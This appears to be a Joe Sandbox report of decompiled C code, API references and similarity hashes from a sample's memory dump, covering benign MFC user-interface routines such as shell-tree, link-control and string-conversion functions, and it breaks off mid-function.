			E00CD4665(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v24;
				char _v28;
				char _v36;
				struct _SHFILEINFOA _v364;
				signed int _v368;
				intOrPtr _v724;
				signed int _t38;
				signed int _t41;
				signed int _t43;
				signed char _t61;
				signed int _t62;
				signed int _t72;
				intOrPtr _t76;
				signed int _t90;
				void* _t95;
				signed int _t98;
				intOrPtr _t99;
				void* _t100;
				signed int _t102;
				signed int _t103;
				signed int _t106;
				signed int _t107;

				_t97 = __esi;
				_t96 = __edi;
				_t95 = __edx;
				_t75 = __ebx;
				_t102 = _t106;
				_t107 = _t106 - 0x164;
				_t38 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t38 ^ _t102;
				_t76 = _a4;
				if(_t76 == 0) {
					E00CAA4E7(__ebx, _t76, __edi, __esi, __eflags);
					asm("int3");
					_push(_t102);
					_t103 = _t107;
					_t41 =  *0xe68dd4; // 0x8d2643c2
					_v368 = _t41 ^ _t103;
					_t43 = _v364.szDisplayName;
					_push(__esi);
					_t98 = _v364.dwAttributes;
					_v724 = _t98;
					__eflags = _t43;
					if(__eflags == 0) {
						E00CAA4E7(__ebx, _t76, __edi, _t98, __eflags);
						asm("int3");
						_push(0x10);
						E00DDD52C(0xe0952a, __ebx, __edi, _t98);
						_t99 = _t76;
						E00CA67E1( &_v28);
						_v12 = _v12 & 0x00000000;
						E00CC1628(_a4,  &_v28, _v0);
						_push(_v28);
						E00D0EB00(_t75,  &_v36, _t96, _t99, __eflags);
						E00CA67E1( &_v24);
						_v12 = 2;
						_t53 = E00D0EB78(_t75,  &_v36, _t96, _t99, __eflags, "MFCShellTreeCtrl_EnableShellContextMenu",  &_v24, 0);
						__eflags = _t53;
						if(_t53 != 0) {
							_t53 = _v24;
							__eflags =  *(_v24 - 0xc);
							if(__eflags != 0) {
								E00CC58DD( &_v24, __eflags);
								_push("TRUE");
								_t61 = E00CBFB65(_t75, _t96, _t99,  &_v24);
								_t53 = _t61 & 0x000000ff;
								 *(_t99 + 0x80) = _t61 & 0x000000ff;
							}
						}
						E00CA2975(E00D0EB37(E00CA2975(_t53, _v24 - 0x10),  &_v36), _v28 - 0x10);
						__eflags = 0;
						return E00DDD4FA(0);
					} else {
						_t62 = SHGetFileInfoA( *(_t43 + 4), 0,  &_v364, 0x160, 0x208);
						_t90 = _t98;
						__eflags = _t62;
						if(__eflags == 0) {
							_push("???");
						} else {
							_push( &(_v364.szDisplayName));
						}
						E00CA2ABC(_t75, _t90, _t96, _t98, __eflags);
						__eflags = _v12 ^ _t103;
						_pop(_t100);
						return E00DDCBCE(_t98, _t75, _v12 ^ _t103, _t95, _t96, _t100);
					}
				} else {
					asm("sbb eax, eax");
					_t72 = SHGetFileInfoA( *(_t76 + 4), 0,  &(_v364.iIcon), 0x160, ( ~_a8 & 0xffff8002) + 0xc009);
					if(_t72 == 0) {
						_t73 = _t72 | 0xffffffff;
						__eflags = _t72 | 0xffffffff;
					} else {
						_t73 = _v364.dwAttributes;
					}
					return E00DDCBCE(_t73, _t75, _v8 ^ _t102, _t95, _t96, _t97);
				}
			}

0x00cd4665
0x00cd4665
0x00cd4665
0x00cd4665
0x00cd4666
0x00cd4668
0x00cd466e
0x00cd4675
0x00cd4678
0x00cd467d
0x00cd46c5
0x00cd46ca
0x00cd46cb
0x00cd46cc
0x00cd46d4
0x00cd46db
0x00cd46de
0x00cd46e1
0x00cd46e2
0x00cd46e5
0x00cd46eb
0x00cd46ed
0x00cd4735
0x00cd473a
0x00cd473b
0x00cd4742
0x00cd4747
0x00cd474c
0x00cd4754
0x00cd475f
0x00cd4764
0x00cd476a
0x00cd4772
0x00cd477c
0x00cd4789
0x00cd478e
0x00cd4790
0x00cd4792
0x00cd4795
0x00cd4799
0x00cd479e
0x00cd47a6
0x00cd47ac
0x00cd47b2
0x00cd47b6
0x00cd47b6
0x00cd4799
0x00cd47d5
0x00cd47da
0x00cd47e1
0x00cd46ef
0x00cd4705
0x00cd470b
0x00cd470d
0x00cd470f
0x00cd471a
0x00cd4711
0x00cd4717
0x00cd4717
0x00cd471f
0x00cd4729
0x00cd472b
0x00cd4732
0x00cd4732
0x00cd467f
0x00cd4684
0x00cd46a2
0x00cd46aa
0x00cd46b4
0x00cd46b4
0x00cd46ac
0x00cd46ac
0x00cd46ac
0x00cd46c2
0x00cd46c2

APIs

SHGetFileInfoA.SHELL32(?,00000000,?,00000160,?), ref: 00CD46A2
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000208), ref: 00CD4705
__EH_prolog3.LIBCMT ref: 00CD4742

Part of subcall function 00CC1628: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00CC1641

Part of subcall function 00D0EB00: __EH_prolog3.LIBCMT ref: 00D0EB07

Part of subcall function 00D0EB78: __EH_prolog3.LIBCMT ref: 00D0EB7F
Part of subcall function 00D0EB78: __fassign.LIBCMT ref: 00D0EC92

Strings

MFCShellTreeCtrl_EnableShellContextMenu, xrefs: 00CD4781
TRUE, xrefs: 00CD47A6
???, xrefs: 00CD471A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$FileInfo$ByteCharMultiWide__fassign
String ID: ???$MFCShellTreeCtrl_EnableShellContextMenu$TRUE
API String ID: 1991860042-3649263699
Opcode ID: ca55728bcab8afd3579ceaba8ef516a9fd90a9ee0d1e9c00f4526d7dd263c7a9
Instruction ID: d6dee0192bb015dcf46a4a51c1a4449d6e4eea9a80d21d45c0e46c78c9328752
Opcode Fuzzy Hash: ca55728bcab8afd3579ceaba8ef516a9fd90a9ee0d1e9c00f4526d7dd263c7a9
Instruction Fuzzy Hash: 00419F31A0021AABDB14EFA4DD46FEE73B8AF15704F104469B516A72D1DF74EA08DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CC6B03 Relevance: 10.6, APIs: 7, Instructions: 116
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00CC6B03(void* __ecx, void* __edx, long _a4) {
				intOrPtr _v8;
				void* __ebx;
				intOrPtr _t28;
				void* _t29;
				void* _t33;
				void* _t38;
				int _t40;
				void* _t43;
				void* _t45;
				void* _t46;
				intOrPtr _t49;
				signed short _t50;
				long _t54;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t66;
				struct HWND__* _t68;
				void* _t78;

				_t62 = __edx;
				_t57 = __ecx;
				_push(__ecx);
				_t54 = _a4;
				_t64 = __ecx;
				_t68 = 0;
				_t28 =  *((intOrPtr*)(__ecx + 0x78c));
				if(_t28 != 0 &&  *(_t28 + 0x20) != 0 && ( *((intOrPtr*)(_t54 + 4)) == 0x201 ||  *((intOrPtr*)(_t54 + 4)) == 0x202 ||  *((intOrPtr*)(_t54 + 4)) == 0x200)) {
					SendMessageA( *(_t28 + 0x20), 0x407, _t68, _t54);
				}
				if( *((intOrPtr*)(_t54 + 4)) != 0x100) {
					L24:
					_t29 = E00CB4A8F(_t64, __eflags, _t54);
					goto L25;
				} else {
					if( *((intOrPtr*)(_t54 + 8)) != 0xd) {
						L13:
						__eflags =  *((intOrPtr*)(_t54 + 4)) - 0x100;
						if(__eflags != 0) {
							goto L24;
						}
						__eflags =  *((intOrPtr*)(_t64 + 0xcc)) - _t68;
						if(__eflags == 0) {
							goto L24;
						}
						__eflags = E00CB277F(_t54, _t57, _t62, GetParent( *(_t64 + 0x20)));
						if(__eflags == 0) {
							goto L24;
						}
						_t33 =  *((intOrPtr*)(_t54 + 8)) - 0x20;
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags =  *((intOrPtr*)(_t64 + 0xc4)) - _t68;
							if(__eflags == 0) {
								goto L24;
							}
							__eflags =  *(_t64 + 0xc0) - _t68;
							 *(_t64 + 0xc0) = 0 |  *(_t64 + 0xc0) == _t68;
							RedrawWindow( *(_t64 + 0x20), _t68, _t68, 0x105);
							_t38 = E00CB277F(_t54, _t57, _t62, GetParent( *(_t64 + 0x20)));
							_t66 =  *(_t64 + 0x20);
							_t56 = _t38;
							_t40 = GetWindowLongA(_t66, 0xfffffff4) & 0x0000ffff;
							__eflags = _t56;
							if(_t56 != 0) {
								_t68 =  *(_t56 + 0x20);
							}
							SendMessageA(_t68, 0x111, _t40, _t66);
							L11:
							L12:
							_t29 = 1;
							L25:
							return _t29;
						}
						_t43 = _t33 - 5;
						__eflags = _t43;
						if(_t43 == 0) {
							L22:
							_push(_t68);
							L23:
							__eflags = E00CC532F(_t64, _t62);
							if(__eflags != 0) {
								goto L12;
							}
							goto L24;
						}
						_t45 = _t43 - 1;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L22;
						}
						_t46 = _t45 - 1;
						__eflags = _t46;
						if(_t46 == 0) {
							L21:
							_push(1);
							goto L23;
						}
						__eflags = _t46 - 1;
						if(__eflags != 0) {
							goto L24;
						}
						goto L21;
					}
					_t78 =  *0xe885a8 - _t68; // 0x0
					if(_t78 != 0) {
						goto L13;
					}
					_t49 = E00CB277F(_t54, _t57, _t62, GetParent( *(_t64 + 0x20)));
					_v8 = _t49;
					if(_t49 == 0) {
						goto L13;
					}
					_t50 = E00CB7697(_t64);
					SendMessageA( *(_v8 + 0x20), 0x111, _t50 & 0x0000ffff,  *(_t64 + 0x20));
					goto L11;
				}
			}

0x00cc6b03
0x00cc6b03
0x00cc6b06
0x00cc6b08
0x00cc6b0d
0x00cc6b0f
0x00cc6b11
0x00cc6b19
0x00cc6b45
0x00cc6b45
0x00cc6b52
0x00cc6bf1
0x00cc6bf4
0x00000000
0x00cc6b58
0x00cc6b5c
0x00cc6ba1
0x00cc6ba1
0x00cc6ba8
0x00000000
0x00000000
0x00cc6baa
0x00cc6bb0
0x00000000
0x00000000
0x00cc6bc1
0x00cc6bc3
0x00000000
0x00000000
0x00cc6bc8
0x00cc6bc8
0x00cc6bcb
0x00cc6c00
0x00cc6c06
0x00000000
0x00000000
0x00cc6c0f
0x00cc6c1d
0x00cc6c23
0x00cc6c33
0x00cc6c38
0x00cc6c3b
0x00cc6c46
0x00cc6c49
0x00cc6c4b
0x00cc6c4d
0x00cc6c4d
0x00cc6b96
0x00cc6b96
0x00cc6b9c
0x00cc6b9e
0x00cc6bf9
0x00cc6bfd
0x00cc6bfd
0x00cc6bcd
0x00cc6bcd
0x00cc6bd0
0x00cc6be5
0x00cc6be5
0x00cc6be6
0x00cc6bed
0x00cc6bef
0x00000000
0x00000000
0x00000000
0x00cc6bef
0x00cc6bd2
0x00cc6bd2
0x00cc6bd5
0x00000000
0x00000000
0x00cc6bd7
0x00cc6bd7
0x00cc6bda
0x00cc6be1
0x00cc6be1
0x00000000
0x00cc6be1
0x00cc6bdc
0x00cc6bdf
0x00000000
0x00000000
0x00000000
0x00cc6bdf
0x00cc6b5e
0x00cc6b64
0x00000000
0x00000000
0x00cc6b70
0x00cc6b75
0x00cc6b7a
0x00000000
0x00000000
0x00cc6b81
0x00cc6b96
0x00000000
0x00cc6b96

APIs

SendMessageA.USER32(?,00000407,00000000,?), ref: 00CC6B45
GetParent.USER32(?), ref: 00CC6B69
SendMessageA.USER32(00000000,00000111,?,?), ref: 00CC6B96
GetParent.USER32(?), ref: 00CC6BB5
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00CC6C23
GetParent.USER32(?), ref: 00CC6C2C
GetWindowLongA.USER32 ref: 00CC6C40

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Parent$MessageSendWindow$LongRedraw
String ID:
API String ID: 4271267155-0
Opcode ID: d7bc26d7bf4098b3000fbef23c880f2f46fe94969330aadd6fe0fe82bbbd0b81
Instruction ID: 257031ac27c52b3f3d4203b91135b9ba6de9f74f7bc2249e642bd31fb0bce4f5
Opcode Fuzzy Hash: d7bc26d7bf4098b3000fbef23c880f2f46fe94969330aadd6fe0fe82bbbd0b81
Instruction Fuzzy Hash: EE31D131204211EFDF255F29CE99FB6BAA8FB08751F044229F999E6061CB70DD40EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CCA430 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00CCA430(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t50;
				void* _t53;
				intOrPtr _t68;
				void* _t106;
				void* _t110;
				void* _t111;
				void* _t112;

				_t112 = __eflags;
				_t106 = __edx;
				_t76 = __ebx;
				_push(0x1c);
				E00DDD52C(0xe097b7, __ebx, __edi, __esi);
				_t110 = __ecx;
				E00CA67E1(_t111 - 0x20);
				 *((intOrPtr*)(_t111 - 4)) = 0;
				E00CC1628( *((intOrPtr*)(_t111 + 0xc)), _t111 - 0x20,  *((intOrPtr*)(_t111 + 8)));
				_push( *((intOrPtr*)(_t111 - 0x20)));
				E00D0EB00(__ebx, _t111 - 0x28, 0, _t110, _t112);
				E00CA67E1(_t111 - 0x1c);
				 *((char*)(_t111 - 4)) = 2;
				_t50 = E00D0EB78(__ebx, _t111 - 0x28, 0, _t110, _t112, "MFCLink_Url", _t111 - 0x1c, 0);
				_t113 = _t50;
				if(_t50 != 0) {
					E00CCA5C0(_t76, _t110, _t110,  *((intOrPtr*)(_t111 - 0x1c)));
				}
				E00CA67E1(_t111 - 0x18);
				 *((char*)(_t111 - 4)) = 3;
				_t53 = E00D0EB78(_t76, _t111 - 0x28, 0, _t110, _t113, "MFCLink_UrlPrefix", _t111 - 0x18, 0);
				_t114 = _t53;
				if(_t53 != 0) {
					_push( *((intOrPtr*)(_t111 - 0x18)));
					E00CCA5F2(_t76, _t110, _t106, 0, _t110);
				}
				E00CA67E1(_t111 - 0x10);
				 *((char*)(_t111 - 4)) = 4;
				if(E00D0EB78(_t76, _t111 - 0x28, 0, _t110, _t114, "MFCLink_FullTextTooltip", _t111 - 0x10, 0) != 0) {
					_t68 =  *((intOrPtr*)(_t111 - 0x10));
					_t116 =  *((intOrPtr*)(_t68 - 0xc));
					if( *((intOrPtr*)(_t68 - 0xc)) != 0) {
						E00CC58DD(_t111 - 0x10, _t116);
						_push("TRUE");
						E00CC5800(_t110, E00CBFB65(_t76, 0, _t110, _t111 - 0x10) & 0x000000ff);
					}
				}
				E00CA67E1(_t111 - 0x14);
				 *((char*)(_t111 - 4)) = 5;
				if(E00D0EB78(_t76, _t111 - 0x28, 0, _t110, _t116, "MFCLink_Tooltip", _t111 - 0x14, 0) != 0) {
					_t59 = E00CC7158(_t76, _t110, _t106,  *((intOrPtr*)(_t111 - 0x14)));
				}
				E00CA2975(E00D0EB37(E00CA2975(E00CA2975(E00CA2975(E00CA2975(_t59,  *((intOrPtr*)(_t111 - 0x14)) - 0x10),  *((intOrPtr*)(_t111 - 0x10)) - 0x10),  *((intOrPtr*)(_t111 - 0x18)) - 0x10),  *((intOrPtr*)(_t111 - 0x1c)) - 0x10), _t111 - 0x28),  *((intOrPtr*)(_t111 - 0x20)) - 0x10);
				return E00DDD4FA(0);
			}

0x00cca430
0x00cca430
0x00cca430
0x00cca430
0x00cca437
0x00cca43c
0x00cca441
0x00cca452
0x00cca455
0x00cca45a
0x00cca460
0x00cca468
0x00cca471
0x00cca47e
0x00cca483
0x00cca485
0x00cca48c
0x00cca48c
0x00cca494
0x00cca49d
0x00cca4aa
0x00cca4af
0x00cca4b1
0x00cca4b3
0x00cca4b8
0x00cca4b8
0x00cca4c0
0x00cca4c9
0x00cca4dd
0x00cca4df
0x00cca4e2
0x00cca4e5
0x00cca4ea
0x00cca4f2
0x00cca505
0x00cca505
0x00cca4e5
0x00cca50d
0x00cca516
0x00cca52a
0x00cca531
0x00cca531
0x00cca570
0x00cca57c

APIs

__EH_prolog3.LIBCMT ref: 00CCA437

Part of subcall function 00CC1628: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00CC1641

Part of subcall function 00D0EB00: __EH_prolog3.LIBCMT ref: 00D0EB07

Part of subcall function 00D0EB78: __EH_prolog3.LIBCMT ref: 00D0EB7F
Part of subcall function 00D0EB78: __fassign.LIBCMT ref: 00D0EC92

Strings

MFCLink_Url, xrefs: 00CCA476
MFCLink_Tooltip, xrefs: 00CCA51B
TRUE, xrefs: 00CCA4F2
MFCLink_UrlPrefix, xrefs: 00CCA4A2
MFCLink_FullTextTooltip, xrefs: 00CCA4CE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide__fassign
String ID: MFCLink_FullTextTooltip$MFCLink_Tooltip$MFCLink_Url$MFCLink_UrlPrefix$TRUE
API String ID: 1708987901-3373932565
Opcode ID: 71f3ce2a643bf7004351f7b56519ee497a90cc9119b1ebcb0437059786e031b4
Instruction ID: d283cda35f3cc09da4a0ca533916a4b5de3ffde3f90dc62570b9b4a290d14c0d
Opcode Fuzzy Hash: 71f3ce2a643bf7004351f7b56519ee497a90cc9119b1ebcb0437059786e031b4
Instruction Fuzzy Hash: 44413A3190011AAADF08EBA4CC96EFEB778AF55308F144459E812B21D1EF349A0ADB30

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1628 Relevance: 10.6, APIs: 7, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CC1628(char* _a4, intOrPtr _a8, int _a12) {
				signed int _v8;
				short* _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				int _t22;
				int _t35;
				char* _t42;
				signed int _t53;
				int _t56;
				short* _t59;
				int _t60;
				char* _t62;

				_push(_t44);
				_t56 = 0;
				_t42 = 0;
				_t22 = MultiByteToWideChar(0xfde9, 0, _a4, _a12, 0, 0);
				_v8 = _t22;
				if(_t22 > 0) {
					_t53 = 2;
					_push( ~(0 | __eflags > 0x00000000) | (_t22 + 0x00000001) * _t53);
					_t59 = E00CA95C0(__eflags);
					_v12 = _t59;
					E00DDFBE0(0, _t59, 0, 2 + _v8 * 2);
					MultiByteToWideChar(0xfde9, 0, _a4, _a12, _t59, _v8);
					_t60 = WideCharToMultiByte(GetACP(), 0, _t59, 0xffffffff, 0, 0, 0, 0);
					_v8 = _t60;
					__eflags = _t60;
					if(_t60 > 0) {
						_t62 = _t60 + 1;
						__eflags = _t62;
						_push(_t62);
						_t42 = E00CA95C0(_t62);
						E00DDFBE0(0, _t42, 0, _t62);
						_t60 = _v8;
						WideCharToMultiByte(GetACP(), 0, _v12, 0xffffffff, _t42, _t60, 0, 0);
					}
					L00CA95BB(_v12);
					__eflags = _t42;
					if(_t42 != 0) {
						_t56 = E00DEC1A0(_t42);
					}
					_push(_t56);
					E00CA2CD7(_t42, _a8, _t56, _t60, _t42);
					L00CA95BB(_t42);
					_t35 = _t60;
				} else {
					_t35 = 0;
				}
				return _t35;
			}

0x00cc162c
0x00cc162f
0x00cc1636
0x00cc1641
0x00cc1647
0x00cc164c
0x00cc165b
0x00cc1665
0x00cc166b
0x00cc1670
0x00cc167d
0x00cc1695
0x00cc16b0
0x00cc16b2
0x00cc16b5
0x00cc16b7
0x00cc16b9
0x00cc16b9
0x00cc16ba
0x00cc16c1
0x00cc16c5
0x00cc16ca
0x00cc16e1
0x00cc16e1
0x00cc16ea
0x00cc16f0
0x00cc16f2
0x00cc16fb
0x00cc16fb
0x00cc1700
0x00cc1702
0x00cc1708
0x00cc170e
0x00cc164e
0x00cc164e
0x00cc164e
0x00cc1714

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00CC1641
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 00CC1695
GetACP.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00CC16A3
WideCharToMultiByte.KERNEL32(00000000), ref: 00CC16AA
GetACP.KERNEL32(00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00CC16DA
WideCharToMultiByte.KERNEL32(00000000), ref: 00CC16E1
_strlen.LIBCMT ref: 00CC16F5

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ByteCharMultiWide$_strlen
String ID:
API String ID: 1433632580-0
Opcode ID: 78fdd2d4430e5c8de5115ca720f1cbe1a67492bf0ded19ec6a7bf844b6c776fc
Instruction ID: 6237fbaaa9c5bd3147d536807287bbaa70eeb8dd6fc848bb4fbf3c16a12272af
Opcode Fuzzy Hash: 78fdd2d4430e5c8de5115ca720f1cbe1a67492bf0ded19ec6a7bf844b6c776fc
Instruction Fuzzy Hash: 8321D372500155BFDB216BA79C4EDAF3E7CEFC7B60B14051DF916E21A2DA308A00D670

Uniqueness

Uniqueness Score: -1.00%

Function 00CC532F Relevance: 10.6, APIs: 7, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00CC532F(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				void* __ebx;
				int _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				struct HWND__* _t34;
				void* _t42;
				void* _t48;
				long _t49;
				int _t51;
				void* _t55;
				struct HWND__* _t56;
				void* _t57;

				_t55 = __edx;
				_t50 = __ecx;
				_t48 = __ecx;
				_t56 = 0;
				if( *((intOrPtr*)(__ecx + 0xc8)) == 0) {
					L15:
					return 0;
				}
				_t51 = E00CB277F(_t48, _t50, _t55, GetParent( *(__ecx + 0x20)));
				_v16 = _t51;
				_t29 = 0 | _a4 == 0x00000000;
				_v12 = _t29;
				_t31 = E00CB277F(_t48, _t51, _t55, GetNextDlgGroupItem( *(_t51 + 0x20),  *(_t48 + 0x20), _t29));
				_v8 = _t31;
				if(_t31 == _t48) {
					goto L15;
				} else {
					goto L2;
				}
				do {
					L2:
					_t57 = E00CACA6C(0xe1b488, _t31);
					_pop(_t53);
					if(_t57 != 0 &&  *((intOrPtr*)(_t57 + 0xc8)) != _t56) {
						_t53 = _t57;
						if((E00CB778C(_t57) & 0x18000000) == 0x10000000) {
							L10:
							if(_t57 == _t48 ||  *((intOrPtr*)(_t57 + 0xc0)) != _t56) {
								goto L15;
							} else {
								SendMessageA( *(_t57 + 0x20), 0xf1, 1, _t56);
								E00CB7A0A(_t48, _t57, _t55);
								_t49 =  *(_t57 + 0x20);
								_v16 = GetWindowLongA(_t49, 0xfffffff4) & 0x0000ffff;
								_t42 = E00CB277F(_t49, _t57, _t55, GetParent( *(_t57 + 0x20)));
								if(_t42 != 0) {
									_t56 =  *(_t42 + 0x20);
								}
								SendMessageA(_t56, 0x111, _v16, _t49);
								return 1;
							}
						}
					}
					_t33 = _v8;
					if(_t33 != 0) {
						_t34 =  *(_t33 + 0x20);
					} else {
						_t34 = _t56;
					}
					_t31 = E00CB277F(_t48, _t53, _t55, GetNextDlgGroupItem( *(_v16 + 0x20), _t34, _v12));
					_v8 = _t31;
				} while (_t31 != _t48);
				if(_t57 == 0) {
					goto L15;
				}
				goto L10;
			}

0x00cc532f
0x00cc532f
0x00cc5337
0x00cc533a
0x00cc5342
0x00cc5443
0x00000000
0x00cc5443
0x00cc5357
0x00cc535e
0x00cc5361
0x00cc5368
0x00cc5375
0x00cc537a
0x00cc537f
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc5385
0x00cc5385
0x00cc5390
0x00cc5393
0x00cc5396
0x00cc53a0
0x00cc53b1
0x00cc53e2
0x00cc53e4
0x00000000
0x00cc53ee
0x00cc53f9
0x00cc5401
0x00cc5406
0x00cc5418
0x00cc5422
0x00cc5429
0x00cc542b
0x00cc542b
0x00cc5438
0x00000000
0x00cc5440
0x00cc53e4
0x00cc53b1
0x00cc53b3
0x00cc53b8
0x00cc53be
0x00cc53ba
0x00cc53ba
0x00cc53ba
0x00cc53d2
0x00cc53d7
0x00cc53da
0x00cc53e0
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 00CC534B
GetNextDlgGroupItem.USER32(?,00000000,00000000), ref: 00CC536E
GetNextDlgGroupItem.USER32(?,?,?), ref: 00CC53CB
SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 00CC53F9
GetWindowLongA.USER32 ref: 00CC540C
GetParent.USER32(?), ref: 00CC541B
SendMessageA.USER32(00000000,00000111,?,?), ref: 00CC5438

Part of subcall function 00CB778C: GetWindowLongA.USER32 ref: 00CB7799

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: GroupItemLongMessageNextParentSendWindow
String ID:
API String ID: 4258059889-0
Opcode ID: c99ca1155992090a20ea7f9eb4e13ba482ed262db2ce40e8b40bfbc15f911598
Instruction ID: 3c1b3a74b352808dccde3e97f10780ac8ca90c59130e040f490167c3be75d300
Opcode Fuzzy Hash: c99ca1155992090a20ea7f9eb4e13ba482ed262db2ce40e8b40bfbc15f911598
Instruction Fuzzy Hash: 6531F372A04610AFCF11AFB4CC48EAE77B9FB48741F144569F995E7161EA30DAC0DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00D04D6D Relevance: 10.6, APIs: 7, Instructions: 95
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00D04D6D(int __ecx, long __edx, intOrPtr _a4, signed int _a8, signed int _a12) {
				struct tagPOINT _v12;
				void* __ebx;
				void* _t48;
				int _t63;
				int _t70;
				int _t75;

				_t66 = __edx;
				_t54 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t70 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x26c)) != 0 ||  *((intOrPtr*)(__ecx + 0x29c)) != 0) {
					E00D06A8E(_t54, 0);
					 *((intOrPtr*)(_t70 + 0x26c)) = 0;
					 *((intOrPtr*)(_t70 + 0x29c)) = 0;
					ReleaseCapture();
				}
				 *0xe17a64();
				if( *((intOrPtr*)( *((intOrPtr*)( *_t70 + 0x2f0))))() != 0) {
